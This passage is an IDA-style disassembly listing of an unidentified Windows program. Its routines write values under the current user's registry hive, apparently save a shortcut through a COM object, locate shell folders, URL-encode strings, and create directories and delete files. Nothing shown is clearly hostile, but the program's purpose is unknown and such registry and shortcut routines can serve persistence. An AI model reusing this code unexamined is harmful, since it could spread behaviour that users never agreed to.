lea ecx, [esp+10h+arg_8]
push ecx
push 20006h
push 0
push esi
push 80000001h
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_40A093
mov ecx, ebx
call sub_409F60
mov ecx, eax
lea esi, [ecx+1]
jmp short loc_40A0D0
; ---------------------------------------------------------------------------
align 10h
loc_40A0D0: ; CODE XREF: sub_40A040+8B�j
; sub_40A040+95�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_40A0D0
mov edx, [esp+10h+arg_8]
sub ecx, esi
push ecx
push eax
push 1
push 0
push ebp
push edx
call ds:dword_40F010 ; RegSetValueExA
mov ebx, eax
mov eax, [esp+10h+arg_8]
neg ebx
sbb bl, bl
push eax
inc bl
call ds:dword_40F020 ; RegCloseKey
pop edi
pop esi
pop ebp
mov al, bl
pop ebx
retn 0Ch
sub_40A040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A110 proc near ; CODE XREF: sub_403350+5B3�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 210h
push esi
lea eax, [esp+214h+var_210]
push eax
push offset dword_40FC3C
push 1
push 0
push offset dword_40FC4C
mov esi, ecx
call ds:dword_40F26C
test eax, eax
jge short loc_40A142
xor al, al
pop esi
add esp, 210h
retn 8
; ---------------------------------------------------------------------------
loc_40A142: ; CODE XREF: sub_40A110+24�j
mov eax, [esp+214h+var_210]
mov ecx, [eax]
lea edx, [esp+214h+var_20C]
push edx
push offset dword_40FC7C
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_40A1C1
mov ecx, esi
call sub_409F60
mov esi, eax
push esi
call sub_40B3BD
mov edx, [esp+218h+arg_0]
mov eax, [esp+218h+var_210]
mov ecx, [eax]
add esp, 4
push edx
push eax
call dword ptr [ecx+50h]
mov edx, [esp+214h+arg_4]
mov eax, [esp+214h+var_210]
mov ecx, [eax]
push edx
push eax
call dword ptr [ecx+1Ch]
push 104h
lea eax, [esp+218h+var_208]
push eax
push 0FFFFFFFFh
push esi
push 0
push 0
call ds:dword_40F038 ; MultiByteToWideChar
mov eax, [esp+214h+var_20C]
mov ecx, [eax]
push 1
lea edx, [esp+218h+var_208]
push edx
push eax
call dword ptr [ecx+18h]
mov eax, [esp+214h+var_20C]
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40A1C1: ; CODE XREF: sub_40A110+47�j
mov eax, [esp+214h+var_210]
mov edx, [eax]
push eax
call dword ptr [edx+8]
mov al, 1
pop esi
add esp, 210h
retn 8
sub_40A110 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A1E0 proc near ; CODE XREF: sub_4030B0+43�p
; .text:004031F1�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ecx
mov eax, [esp+4+arg_4]
push esi
mov esi, ecx
mov ecx, [esp+8+arg_0]
push eax
push ecx
lea ecx, [esp+10h+var_4]
mov [esp+10h+var_4], 0
call sub_401DD0
cmp al, 1
jz short loc_40A215
mov edx, [esp+8+var_4]
push edx
call ds:dword_40F194
xor al, al
pop esi
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_40A215: ; CODE XREF: sub_40A1E0+21�j
push ebx
mov ebx, ds:dword_40F194
push edi
mov edi, [esp+10h+var_4]
test edi, edi
jz short loc_40A24A
mov ecx, [esi]
lea eax, [esp+10h+arg_4]
push eax
push edi
push ecx
mov [esp+1Ch+arg_4], 0
call sub_40A570
test eax, eax
jl short loc_40A24A
mov edx, [esi]
push edx
call ebx
mov eax, [esp+10h+arg_4]
mov [esi], eax
loc_40A24A: ; CODE XREF: sub_40A1E0+43�j
; sub_40A1E0+5D�j
push edi
call ebx
pop edi
pop ebx
mov al, 1
pop esi
pop ecx
retn 8
sub_40A1E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A260 proc near ; CODE XREF: sub_403350+F3�p
; sub_403350+1A3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov edi, [esp+0Ch+arg_4]
inc edi
push edi ; Size
mov ebx, ecx
call _malloc
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_40A281
pop edi
pop esi
xor al, al
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_40A281: ; CODE XREF: sub_40A260+17�j
mov eax, [esp+0Ch+arg_0]
push edi
push eax
push esi
call ds:dword_40F09C ; lstrcpyn
push esi
mov ecx, ebx
call sub_402310
push esi ; Memory
call _free
add esp, 4
pop edi
pop esi
mov al, 1
pop ebx
retn 8
sub_40A260 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A2B0 proc near ; CODE XREF: sub_403350+18A�p
; sub_40A390+F�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov edx, [esp+4+arg_0]
push ebp
lea eax, [esp+8+var_4]
push eax
push 0
mov ebp, ecx
mov ecx, [esp+10h+arg_4]
push 0
push ecx
push edx
mov [esp+1Ch+var_4], 0
call ds:dword_40F00C ; RegOpenKeyExA
test eax, eax
jz short loc_40A2E0
xor al, al
pop ebp
pop ecx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A2E0: ; CODE XREF: sub_40A2B0+27�j
mov edx, [esp+8+var_4]
push ebx
mov ebx, ds:dword_40F01C
push edi
mov edi, [esp+10h+arg_8]
lea eax, [esp+10h+arg_4]
push eax
push 0
lea ecx, [esp+18h+arg_0]
push ecx
push 0
push edi
push edx
call ebx ; RegQueryValueExA
test eax, eax
jnz short loc_40A378
cmp [esp+0Ch+arg_4], 1
jnz short loc_40A378
mov eax, [esp+0Ch+arg_8]
inc eax
push esi
push eax ; Size
call _malloc
mov ecx, [esp+14h]
mov esi, eax
add esp, 4
test esi, esi
jnz short loc_40A337
push ecx
call ds:dword_40F020 ; RegCloseKey
pop esi
pop edi
pop ebx
xor al, al
pop ebp
pop ecx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A337: ; CODE XREF: sub_40A2B0+74�j
lea edx, [esp+10h+arg_8]
push edx
push esi
lea eax, [esp+18h+arg_4]
push eax
push 0
push edi
push ecx
call ebx ; RegQueryValueExA
mov ebx, eax
neg ebx
sbb bl, bl
inc bl
jz short loc_40A35A
push esi
mov ecx, ebp
call sub_402310
loc_40A35A: ; CODE XREF: sub_40A2B0+A0�j
mov edx, [esp+10h]
push edx
call ds:dword_40F020 ; RegCloseKey
push esi ; Memory
call _free
add esp, 4
pop esi
pop edi
mov al, bl
pop ebx
pop ebp
pop ecx
retn 0Ch
; ---------------------------------------------------------------------------
loc_40A378: ; CODE XREF: sub_40A2B0+54�j
; sub_40A2B0+5B�j
mov eax, [esp+0Ch]
push eax
call ds:dword_40F020 ; RegCloseKey
pop edi
pop ebx
xor al, al
pop ebp
pop ecx
retn 0Ch
sub_40A2B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A390 proc near ; CODE XREF: sub_403350+4DA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push eax
push edx
push 80000001h
call sub_40A2B0
retn 8
sub_40A390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A3B0 proc near ; CODE XREF: sub_403350+156�p
; sub_403350+168�p ...
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 4
sub esp, 10Ch
push ebx
push esi
mov esi, ecx
mov al, [esi+2Ah]
xor ebx, ebx
cmp al, bl
jnz short loc_40A40B
push offset aShell32_dll ; "Shell32.dll"
lea eax, [esp+118h+var_108]
push eax
lea ecx, [esp+11Ch+var_10C]
push ecx
mov ecx, esi
mov byte ptr [esi+2Ah], 1
call sub_409FE0
test al, al
jnz short loc_40A42B
push offset aShfolder_dll ; "SHFolder.dll"
lea edx, [esp+118h+var_108]
push edx
lea eax, [esp+11Ch+var_10C]
push eax
mov ecx, esi
call sub_409FE0
test al, al
jnz short loc_40A42B
mov [esi+0Ch], bl
loc_40A3FE: ; CODE XREF: sub_40A3B0+63�j
; sub_40A3B0+79�j
pop esi
xor al, al
pop ebx
add esp, 10Ch
retn 4
; ---------------------------------------------------------------------------
loc_40A40B: ; CODE XREF: sub_40A3B0+11�j
mov cl, [esi+0Ch]
cmp cl, bl
lea eax, [esi+0Ch]
jz short loc_40A3FE
push eax
lea ecx, [esp+118h+var_108]
push ecx
lea edx, [esp+11Ch+var_10C]
push edx
mov ecx, esi
call sub_409FE0
test al, al
jz short loc_40A3FE
loc_40A42B: ; CODE XREF: sub_40A3B0+2F�j
; sub_40A3B0+49�j
mov ecx, [esp+114h+arg_0]
lea eax, [esp+114h+var_104]
push eax
push ebx
push ebx
push ecx
push ebx
mov [esp+128h+var_104], bl
call [esp+128h+var_108]
cmp eax, ebx
jl short loc_40A460
cmp eax, 1
jg short loc_40A460
cmp [esp+114h+var_104], bl
jz short loc_40A460
lea edx, [esp+114h+var_104]
push edx
mov ecx, esi
call sub_402310
mov bl, 1
loc_40A460: ; CODE XREF: sub_40A3B0+95�j
; sub_40A3B0+9A�j ...
mov eax, [esp+114h+var_10C]
push eax
call ds:dword_40F0C8 ; FreeLibrary
pop esi
mov al, bl
pop ebx
add esp, 10Ch
retn 4
sub_40A3B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A480 proc near ; CODE XREF: sub_403350+2B7�p
; sub_406210+10A�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 4
sub esp, 20h
push esi
push 0Ah ; int
lea eax, [esp+28h+var_20]
mov esi, ecx
mov ecx, [esp+28h+arg_0]
push eax ; char *
push ecx ; __int32
call __ltoa
add esp, 0Ch
lea edx, [esp+24h+var_20]
push edx
mov ecx, esi
call sub_402310
pop esi
add esp, 20h
retn 4
sub_40A480 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40A4B0 proc near ; CODE XREF: sub_406210+EB�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
push edi
mov edi, [esp+0Ch+arg_0]
push edi
mov [esp+10h+var_4], ecx
call ds:dword_40F084 ; lstrlen
lea eax, [eax+eax*2+1]
push eax ; Size
call _malloc
mov ebx, eax
add esp, 4
test ebx, ebx
jnz short loc_40A4DD
pop edi
xor al, al
pop ebx
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_40A4DD: ; CODE XREF: sub_40A4B0+23�j
mov al, [edi]
test al, al
push esi
mov esi, ebx
jz short loc_40A529
push ebp
mov ebp, ds:dword_40F1E0
lea ecx, [ecx+0]
loc_40A4F0: ; CODE XREF: sub_40A4B0+76�j
movsx eax, al
movsx ecx, al
mov [esi], al
inc esi
sub ecx, 20h
inc edi
cmp ecx, 1Eh ; switch 31 cases
ja short loc_40A522 ; default
; jumptable 0040A509 cases 1,2,4,7-27,29
movzx ecx, ds:byte_40A550[ecx]
jmp ds:off_40A548[ecx*4] ; switch jump
loc_40A510: ; DATA XREF: .text:off_40A548�o
push eax ; jumptable 0040A509 cases 0,3,5,6,28,30
lea edx, [esi-1]
push offset a2x ; "%%%2x"
push edx
call ebp ; wsprintfA
add esp, 0Ch
add esi, 2
loc_40A522: ; CODE XREF: sub_40A4B0+50�j
; sub_40A4B0+59�j
; DATA XREF: ...
mov al, [edi] ; default
; jumptable 0040A509 cases 1,2,4,7-27,29
test al, al
jnz short loc_40A4F0
pop ebp
loc_40A529: ; CODE XREF: sub_40A4B0+34�j
mov ecx, [esp+10h+var_4]
push ebx
mov byte ptr [esi], 0
call sub_402310
push ebx ; Memory
call _free
add esp, 4
pop esi
pop edi
mov al, 1
pop ebx
pop ecx
retn 4
sub_40A4B0 endp
; ---------------------------------------------------------------------------
off_40A548 dd offset loc_40A510 ; DATA XREF: sub_40A4B0+59�r
dd offset loc_40A522 ; jump table for switch statement
byte_40A550 db 0, 1, 1, 0 ; DATA XREF: sub_40A4B0+52�r
db 1, 0, 0, 1 ; indirect table for switch statement
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 1, 1, 1, 1
db 0, 1, 0
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40A570 proc near ; CODE XREF: sub_401D80+23�p
; sub_403350+203�p ...
jmp ds:dword_40F17C
sub_40A570 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40E979
loc_40A576: ; CODE XREF: sub_40E979+C5�j
push esi
mov esi, ecx
cmp dword ptr [esi], 0
jz short loc_40A5B6
push ebx
mov ebx, [esi+8]
cmp ebx, [esi+0Ch]
jnb short loc_40A5A8
push edi
loc_40A588: ; CODE XREF: sub_40E979-43D4�j
mov edi, [ebx]
test edi, edi
jz short loc_40A59F
mov eax, [edi+10h]
test eax, eax
jz short loc_40A59B
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40A59B: ; CODE XREF: sub_40E979-43E6�j
and dword ptr [edi+10h], 0
loc_40A59F: ; CODE XREF: sub_40E979-43ED�j
add ebx, 4
cmp ebx, [esi+0Ch]
jb short loc_40A588
pop edi
loc_40A5A8: ; CODE XREF: sub_40E979-43F4�j
lea eax, [esi+10h]
push eax
call ds:dword_40F054 ; RtlDeleteCriticalSection
and dword ptr [esi], 0
pop ebx
loc_40A5B6: ; CODE XREF: sub_40E979-43FD�j
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_40E979
; =============== S U B R O U T I N E =======================================
sub_40A5B8 proc near ; CODE XREF: sub_40E979+5�p
push esi
mov esi, ecx
push edi
lea edi, [esi+10h]
mov ecx, edi
call sub_4012E0
mov ecx, edi
mov dword ptr [esi], 28h
mov dword ptr [esi+4], 400000h
mov dword ptr [esi+8], offset dword_4108EC
mov dword ptr [esi+0Ch], offset dword_4108EC
call sub_401300
test eax, eax
jge short loc_40A5F3
mov byte_4124E0, 1
loc_40A5F3: ; CODE XREF: sub_40A5B8+32�j
pop edi
mov eax, esi
pop esi
retn
sub_40A5B8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40E979
loc_40A5F8: ; CODE XREF: sub_40E979-4339�j
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40A60B
push eax ; Memory
call _free
and dword ptr [esi], 0
pop ecx
loc_40A60B: ; CODE XREF: sub_40E979-437A�j
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_40E979
; =============== S U B R O U T I N E =======================================
sub_40A615 proc near ; CODE XREF: sub_40A645+16�p
push esi
mov esi, ecx
lea ecx, [esi+18h]
call sub_4012E0
xor eax, eax
mov [esi+30h], eax
mov [esi+34h], eax
mov [esi+38h], eax
mov eax, esi
pop esi
retn
sub_40A615 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40E979
loc_40A62F: ; CODE XREF: sub_40E979+CF�j
push esi
mov esi, ecx
lea eax, [esi+18h]
push eax
call ds:dword_40F054 ; RtlDeleteCriticalSection
lea ecx, [esi+30h]
pop esi
jmp loc_40A5F8
; END OF FUNCTION CHUNK FOR sub_40E979
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_40A645 proc near ; CODE XREF: sub_40E979+1B�p
Dst = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_88 = dword ptr -88h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 98h
mov eax, dword_4120F8
push esi
mov [ebp+78h+var_4], eax
mov esi, ecx
call sub_40A615
mov eax, 400000h
push 94h ; Size
mov [esi+8], eax
mov [esi+4], eax
lea eax, [ebp+78h+Dst]
push 0 ; Val
push eax ; Dst
mov dword ptr [esi], 3Ch
mov byte ptr [esi+0Ch], 0
call _memset
add esp, 0Ch
lea eax, [ebp+78h+Dst]
push eax
mov [ebp+78h+Dst], 94h
call ds:dword_40F034 ; GetVersionExA
cmp [ebp+78h+var_88], 2
jnz short loc_40A6A7
cmp [ebp+78h+var_94], 5
jb short loc_40A6BF
jmp short loc_40A6BB
; ---------------------------------------------------------------------------
loc_40A6A7: ; CODE XREF: sub_40A645+58�j
cmp [ebp+78h+var_88], 1
jnz short loc_40A6BF
cmp [ebp+78h+var_94], 4
ja short loc_40A6BB
jnz short loc_40A6BF
cmp [ebp+78h+var_90], 0
jbe short loc_40A6BF
loc_40A6BB: ; CODE XREF: sub_40A645+60�j
; sub_40A645+6C�j
mov byte ptr [esi+0Ch], 1
loc_40A6BF: ; CODE XREF: sub_40A645+5E�j
; sub_40A645+66�j ...
lea ecx, [esi+18h]
mov dword ptr [esi+10h], 710h
mov dword ptr [esi+14h], offset dword_40FC9C
call sub_401300
test eax, eax
jge short loc_40A6E0
mov byte_4124E0, 1
loc_40A6E0: ; CODE XREF: sub_40A645+92�j
mov ecx, [ebp+78h+var_4]
mov eax, esi
pop esi
call sub_40B5F4
add ebp, 78h
leave
retn
sub_40A645 endp
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_4120E0
jmp short loc_40A970
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j__free. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_j__free. PRESS KEYPAD "+" TO EXPAND]
; [0000003D BYTES: COLLAPSED FUNCTION _wcsncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000162 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [00000030 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40AF44 proc near ; CODE XREF: sub_403350+2DD�p
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call ds:dword_40F0FC ; CreateDirectoryA
test eax, eax
jnz short loc_40AF5C
call ds:dword_40F068 ; RtlGetLastWin32Error
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AF5C: ; CODE XREF: sub_40AF44+E�j
xor eax, eax
loc_40AF5E: ; CODE XREF: sub_40AF44+16�j
test eax, eax
jz short loc_40AF6D
push eax
call __dosmaperr
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40AF6D: ; CODE XREF: sub_40AF44+1C�j
xor eax, eax
retn
sub_40AF44 endp
; [00000005 BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [00000082 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BE BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; [000001AD BYTES: COLLAPSED FUNCTION _strtoxl. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _strtol. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000039 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _clock. PRESS KEYPAD "+" TO EXPAND]
; [00000037 BYTES: COLLAPSED FUNCTION ___inittime. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40B393 proc near ; CODE XREF: sub_40B3BD�j
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_40F0B0 ; DeleteFileA
test eax, eax
jnz short loc_40B3A9
call ds:dword_40F068 ; RtlGetLastWin32Error
jmp short loc_40B3AB
; ---------------------------------------------------------------------------
loc_40B3A9: ; CODE XREF: sub_40B393+C�j
xor eax, eax
loc_40B3AB: ; CODE XREF: sub_40B393+14�j
test eax, eax
jz short loc_40B3BA
push eax
call __dosmaperr
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40B3BA: ; CODE XREF: sub_40B393+1A�j
xor eax, eax
retn
sub_40B393 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40B3BD proc near ; CODE XREF: sub_40A110+53�p
jmp sub_40B393
sub_40B3BD endp
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_40B5F4. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40B5E0 proc near ; DATA XREF: .rdata:stru_40FCD8�o
xor eax, eax
inc eax
retn
sub_40B5E0 endp
; =============== S U B R O U T I N E =======================================
sub_40B5E4 proc near ; DATA XREF: .rdata:stru_40FCD8�o
mov esp, [ebp-18h]
sub_40B5E4 endp ; sp-analysis failed
; [0000000D BYTES: COLLAPSED CHUNK OF FUNCTION sub_40B5F4. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_40B5F4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB0D proc near ; CODE XREF: start:loc_40B4DA�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_40FCE8
call __SEH_prolog
mov [ebp+var_1C], offset dword_4108DC
loc_40CB20: ; CODE XREF: sub_40CB0D+3C�j
cmp [ebp+var_1C], offset dword_4108DC
jnb short loc_40CB4B
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_40CB41
call eax
jmp short loc_40CB41
; ---------------------------------------------------------------------------
loc_40CB3A: ; DATA XREF: .rdata:stru_40FCE8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40CB3E: ; DATA XREF: .rdata:stru_40FCE8�o
mov esp, [ebp+ms_exc.old_esp]
loc_40CB41: ; CODE XREF: sub_40CB0D+27�j
; sub_40CB0D+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_40CB20
; ---------------------------------------------------------------------------
loc_40CB4B: ; CODE XREF: sub_40CB0D+1A�j
call __SEH_epilog
retn
sub_40CB0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_40CB51()
sub_40CB51 proc near ; DATA XREF: __cinit:loc_40ACE1�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_40FCF8
call __SEH_prolog
mov [ebp+var_1C], offset dword_4108E4
loc_40CB64: ; CODE XREF: sub_40CB51+3C�j
cmp [ebp+var_1C], offset dword_4108E4
jnb short loc_40CB8F
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_40CB85
call eax
jmp short loc_40CB85
; ---------------------------------------------------------------------------
loc_40CB7E: ; DATA XREF: .rdata:stru_40FCF8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_40CB82: ; DATA XREF: .rdata:stru_40FCF8�o
mov esp, [ebp+ms_exc.old_esp]
loc_40CB85: ; CODE XREF: sub_40CB51+27�j
; sub_40CB51+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_40CB64
; ---------------------------------------------------------------------------
loc_40CB8F: ; CODE XREF: sub_40CB51+1A�j
call __SEH_epilog
retn
sub_40CB51 endp
; [0000005F BYTES: COLLAPSED FUNCTION __dosmaperr. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [0000007E BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000171 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
